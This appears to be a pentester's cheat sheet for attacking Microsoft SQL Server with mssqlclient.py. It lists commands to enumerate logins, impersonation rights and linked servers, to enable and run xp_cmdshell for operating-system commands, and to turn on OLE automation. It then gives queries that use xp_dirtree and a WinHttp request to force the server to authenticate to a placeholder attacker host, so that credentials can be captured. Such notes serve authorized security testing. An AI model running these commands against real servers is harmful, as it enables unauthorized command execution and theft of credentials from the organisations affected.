mssqlclient.py

Great for enumerating/attacking SQL server. This article was very helpful in putting together this cheat sheet.

Basic command to connect to a SQL server

mssqlclient.py user@host -port 123

Connect to SQL server with a domain account and non-standard port

mssqlclient.py domain.com/user@sql1.domain.com -p 123 -windows-auth

Enum logins

enum_logins

Enumerate impersonation values

enum_impersonate

Enumerate linked SQL servers

enum_links

Enable XP_CMDSHELL

enable_xp_cmdshell

Run command using XP_CMDSHELL

xp_cmdshell whoami

Turn on OLE automation

This comes in handy if, for example, you can't coerce Web auth from your attacking system:

sp_configure 'Ole Automation Procedures', 1 
reconfigure

Coerce an SMB connection to an attacker system using XP_DIRTREEE

EXEC xp_dirtree '\\YOUR.ATTACKING.IP.ADDRESS\doesntmatter';

Coerce an HTTP connection to your attacker system:

DECLARE @o INT; EXEC sp_OACreate 'WinHttp.WinHttpRequest.5.1', @o OUT; EXEC sp_OAMethod @o, 'open', NULL, 'GET', 'http://DNS-NAME-OF-YOUR-ATTACK-BOX', 'false'; EXEC sp_OAMethod @o, 'SetAutoLogonPolicy', NULL, 0; EXEC sp_OAMethod @o, 'send'; EXEC sp_OADestroy @o;

Last updated on 2026-03-22